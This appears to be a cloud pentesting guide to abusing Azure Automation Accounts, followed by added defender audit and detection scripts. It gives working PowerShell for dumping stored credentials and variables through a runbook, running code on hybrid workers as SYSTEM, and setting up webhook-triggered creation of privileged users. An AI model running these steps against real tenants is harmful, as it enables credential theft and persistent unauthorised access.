Az - Automation Account


Basic Information

From the docs: Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.

These are like "scheduled tasks" in Azure that will let you execute things (actions or even scripts) to manage, check and configure the Azure environment.

Run As Account

When a Run As account is used, it creates an Azure AD application with a self-signed certificate, creates a service principal and assigns that account the Contributor role in the current subscription (a lot of privileges). Microsoft recommends using a Managed Identity for the Automation Account instead.

Run As accounts will be removed on September 30, 2023 and replaced by Managed Identities.

Runbooks & Jobs

Runbooks allow you to execute arbitrary PowerShell code. An attacker could abuse this to steal the permissions of the attached principal (if any). The code of Runbooks may also contain sensitive info (such as creds).

If you can read the jobs, do so, as they contain the output of each run (potentially sensitive info).

Go to Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

A Runbook can be run in a container inside Azure or in a Hybrid Worker (a non-Azure machine). The Log Analytics Agent is deployed on the VM to register it as a hybrid worker. Hybrid worker jobs run as SYSTEM on Windows and as the nxautomation account on Linux. Each Hybrid Worker is registered in a Hybrid Worker Group.

Therefore, if you can choose to run a Runbook in a Windows Hybrid Worker, you will execute arbitrary commands inside an external machine as System (nice pivot technique).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) configurations for nodes in any cloud or on-premises datacenter. The service also imports DSC Resources, and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting State configuration (DSC) under Configuration Management.

Sensitive information could be found in these configurations.

RCE

It's possible to abuse SC to run arbitrary scripts in the managed machines.

See the page: Az - State Configuration RCE

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
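The two places the text above says to look for leaked secrets are runbook source and job output. The following script is an added defender-side audit (it is not code from the original page) that exports the published version of every runbook the signed-in identity can read and scans the files, plus the Output stream of recent jobs, for secret-looking strings. The regex list, the output folder and the 7-day job window are assumptions; extend the patterns to whatever your tenant treats as a secret.

```powershell
# Added defender-side audit; not code from the original page. Exports every
# published runbook and greps it (and recent job output) for secret-looking
# strings. Patterns, output folder and job lookback window are assumptions.
param(
    [string]$OutputFolder = (Join-Path ([System.IO.Path]::GetTempPath()) 'runbook-audit'),
    [int]$JobLookbackDays = 7
)

# Constructed list of patterns that should never appear in runbook code or output
$SecretPatterns = @(
    'password\s*=\s*["''][^"'']+["'']',           # password = "literal"
    'ConvertTo-SecureString\s+["''][^"'']+["'']',  # secure string built from a literal
    '-AsPlainText',                                # plaintext credential construction
    'client_?secret',                              # app registration secrets
    'AccountKey=[A-Za-z0-9+/=]{20,}',              # storage account connection strings
    'eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}'    # JWT-shaped tokens
)

New-Item -ItemType Directory -Path $OutputFolder -Force | Out-Null
$Findings = [System.Collections.Generic.List[object]]::new()

foreach ($acct in Get-AzAutomationAccount) {
    $common = @{
        ResourceGroupName     = $acct.ResourceGroupName
        AutomationAccountName = $acct.AutomationAccountName
    }
    $acctFolder = Join-Path $OutputFolder $acct.AutomationAccountName
    New-Item -ItemType Directory -Path $acctFolder -Force | Out-Null

    # 1. Runbook source: export each published runbook, then scan the files.
    #    Runbooks that were never published have no Published slot; skip them.
    foreach ($rb in Get-AzAutomationRunbook @common) {
        Export-AzAutomationRunbook @common -Name $rb.Name -Slot Published -OutputFolder $acctFolder -Force -ErrorAction SilentlyContinue | Out-Null
    }
    foreach ($file in Get-ChildItem -Path $acctFolder -File) {
        foreach ($hit in Select-String -Path $file.FullName -Pattern $SecretPatterns) {
            $Findings.Add([pscustomobject]@{
                Account  = $acct.AutomationAccountName
                Source   = "runbook:$($file.BaseName)"
                Line     = $hit.LineNumber
                Evidence = $hit.Line.Trim()
            })
        }
    }

    # 2. Job output: whatever a runbook wrote to its Output stream is kept with
    #    the job, so a runbook that printed a credential leaves it readable here
    $since = (Get-Date).AddDays(-$JobLookbackDays)
    foreach ($job in Get-AzAutomationJob @common -StartTime $since) {
        foreach ($rec in Get-AzAutomationJobOutput @common -Id $job.JobId -Stream Output) {
            foreach ($pattern in $SecretPatterns) {
                if ($rec.Summary -match $pattern) {
                    $Findings.Add([pscustomobject]@{
                        Account  = $acct.AutomationAccountName
                        Source   = "job:$($job.RunbookName)/$($job.JobId)"
                        Line     = 0
                        Evidence = $rec.Summary.Trim()
                    })
                    break   # one finding per output record is enough
                }
            }
        }
    }
}

$Findings | Format-Table -AutoSize
```

Run it from a session where Connect-AzAccount has already been done with a reader-level identity; nothing in it needs write rights. A hit in the job-output section is the more urgent one: job streams are readable by anyone with the Automation Job Operator role or higher, and they survive until the job is purged, so the fix is to stop the runbook from printing the value and then remove the job history, not only to rotate the secret.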

Create a Runbook

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
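The role check above is the attacker's view of one account. As an added defender-side posture check (not code from the original page), the following script inverts it across every Automation Account in the subscription: who holds a role that lets them author or run runbooks, whether a legacy Run As connection is still present, which runbooks are reachable from outside through an enabled webhook, and which Hybrid Worker Groups exist. The list of risky role names and the assumption that newer Az.Automation versions expose an Identity property on the account object are mine; adjust the roles to the custom ones in your tenant.

```powershell
# Added defender-side posture check; not code from the original page. Lists
# runbook-capable principals, legacy Run As connections, webhook-exposed
# runbooks and Hybrid Worker Groups per Automation Account. $RiskyRoles is an
# assumption (built-in roles only); the Identity property needs a recent Az.Automation.
$RiskyRoles = @('Owner', 'Contributor', 'Automation Contributor', 'Automation Operator', 'Automation Job Operator')
$subId = (Get-AzContext).Subscription.Id

$Report = foreach ($acct in Get-AzAutomationAccount) {
    $common = @{
        ResourceGroupName     = $acct.ResourceGroupName
        AutomationAccountName = $acct.AutomationAccountName
    }
    $scope = "/subscriptions/$subId/resourceGroups/$($acct.ResourceGroupName)/providers/Microsoft.Automation/automationAccounts/$($acct.AutomationAccountName)"

    # Who can create, publish or start runbooks? Inherited assignments are
    # included, so a subscription-level Contributor shows up here too.
    $writers = Get-AzRoleAssignment -Scope $scope |
        Where-Object { $_.RoleDefinitionName -in $RiskyRoles } |
        ForEach-Object { "$($_.DisplayName) [$($_.ObjectType)] = $($_.RoleDefinitionName) @ $($_.Scope)" }

    # Legacy Run As account: appears as a connection of type AzureServicePrincipal
    $runAs = Get-AzAutomationConnection @common |
        Where-Object { $_.ConnectionTypeName -eq 'AzureServicePrincipal' }

    # Runbooks anyone holding the webhook URL can start without an Azure identity
    $webhooked = foreach ($rb in Get-AzAutomationRunbook @common) {
        Get-AzAutomationWebhook @common -RunbookName $rb.Name |
            Where-Object { $_.IsEnabled } |
            ForEach-Object { "$($rb.Name) (webhook '$($_.Name)' expires $($_.ExpiryTime))" }
    }

    # Hybrid workers: a job sent to one of these groups executes on the member
    # machine as SYSTEM (Windows) or nxautomation (Linux)
    $hybrid = (Get-AzAutomationHybridWorkerGroup @common).Name

    [pscustomobject]@{
        Account         = $acct.AutomationAccountName
        ManagedIdentity = if ($acct.PSObject.Properties['Identity'] -and $acct.Identity) { $acct.Identity.Type } else { 'none/unknown' }
        RunAsConnection = [bool]$runAs
        Writers         = ($writers -join '; ')
        WebhookRunbooks = ($webhooked -join '; ')
        HybridGroups    = ($hybrid -join '; ')
    }
}

$Report | Format-List
```

Read the output per account: any entry in Writers is a principal whose compromise equals the Automation Account's managed identity or Run As permissions; RunAsConnection = True means a Contributor-level service principal with a certificate still exists and should be migrated to a managed identity; every WebhookRunbooks entry is an unauthenticated entry point whose only protection is the secrecy of the URL, so rotate or remove webhooks that nobody can account for.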

Exfiltrate Creds & Variables defined in an Automation Account using a Run Book

# Change the credentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' # Change this for stealth

# Create the runbook, publish it, start it, and get the output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
# The job's Output stream holds whatever the runbook printed
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summary

You could do the same thing by modifying an existing Runbook, or from the web console.

Steps for Setting Up an Automated Highly Privileged User Creation

1. Initialize an Automation Account

  • Action Required: Create a new Automation Account.

  • Specific Setting: Ensure "Create Azure Run As account" is enabled.

2. Import and Set Up Runbook

  • Source: Download the sample runbook from MicroBurst GitHub Repository.

  • Actions Required:

    • Import the runbook into the Automation Account.

    • Publish the runbook to make it executable.

    • Attach a webhook to the runbook, enabling external triggers.

3. Configure AzureAD Module

  • Action Required: Add the AzureAD module to the Automation Account.

  • Additional Step: Ensure all Azure Automation Modules are updated to their latest versions.

4. Permission Assignment

  • Roles to Assign:

    • User Administrator

    • Subscription Owner

  • Target: Assign these roles to the Automation Account for necessary privileges.

5. Awareness of Potential Access Loss

  • Note: Be aware that configuring such automation might lead to losing control over the subscription.

6. Trigger User Creation

  • Trigger the webhook to create a new user by sending a POST request.

  • Use the PowerShell script provided, replacing $uri with your actual webhook URL and updating $AccountInfo with the desired username and password.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
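Every step of the sequences on this page (creating or importing a runbook, publishing it, attaching a webhook, importing a module, changing credentials or variables, starting a job) is a control-plane write that lands in the Azure Activity Log of the Automation Account. The following script is an added detection example, not code from the original page: it pulls that log for each account and lists those operations by caller and source IP. The operation-name regex, the lookback window and the handling of OperationName/Status (Az.Monitor has returned them both as plain strings and as objects with a .Value property, depending on version) are assumptions of mine.

```powershell
# Added detection example; not code from the original page. Surfaces the
# Automation control-plane operations behind this page's techniques from the
# Azure Activity Log. The regex, lookback window and the string-or-.Value
# handling of OperationName/Status are assumptions.
param([int]$LookbackDays = 7)

# Operation suffixes under Microsoft.Automation/automationAccounts/ worth alerting on
$Interesting = 'runbooks/(draft/)?write|runbooks/publish/action|webhooks/write|jobs/write|modules/write|credentials/write|variables/write|hybridRunbookWorkerGroups'

# Az.Monitor has emitted these fields both as strings and as localizable objects
function Get-PlainValue($x) {
    if ($null -ne $x -and $x.PSObject.Properties['Value']) { return [string]$x.Value }
    return [string]$x
}

$since = (Get-Date).AddDays(-$LookbackDays)
$subId = (Get-AzContext).Subscription.Id

$Events = foreach ($acct in Get-AzAutomationAccount) {
    $resId = "/subscriptions/$subId/resourceGroups/$($acct.ResourceGroupName)/providers/Microsoft.Automation/automationAccounts/$($acct.AutomationAccountName)"
    foreach ($e in Get-AzActivityLog -ResourceId $resId -StartTime $since -WarningAction SilentlyContinue) {
        $op = Get-PlainValue $e.OperationName
        if ($op -notmatch $Interesting -or (Get-PlainValue $e.Status) -ne 'Succeeded') { continue }
        [pscustomobject]@{
            Time      = $e.EventTimestamp
            Account   = $acct.AutomationAccountName
            Caller    = $e.Caller
            CallerIp  = if ($e.HttpRequest) { $e.HttpRequest.ClientIpAddress } else { $null }
            Operation = $op -replace '^Microsoft\.Automation/automationAccounts/', ''
            Target    = ($e.ResourceId -split '/automationAccounts/')[-1]
        }
    }
}

# Chronological view: one caller doing runbooks/write -> publish -> jobs/write
# within minutes is the "new runbook" sequence from this page; a webhooks/write
# on top of it is the persistence step.
$Events | Sort-Object Time | Format-Table Time, Account, Caller, CallerIp, Operation, Target -AutoSize

# Volume per caller: an identity that never touched Automation before and now
# appears here is the first thing to triage
$Events | Group-Object Caller | Sort-Object Count -Descending | Select-Object Count, Name
```

Two caveats when reading the result. The Activity Log records who changed the account, but a runbook started through a webhook shows the webhook, not the person who sent the POST, as the initiator, so a jobs/write with no matching interactive caller is exactly the case the webhook step above produces and should be correlated with the runbook's job history instead. Second, the Activity Log is retained for 90 days by default; for anything longer, or for alerting rather than hunting, forward it to a Log Analytics workspace and express the same filter there.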
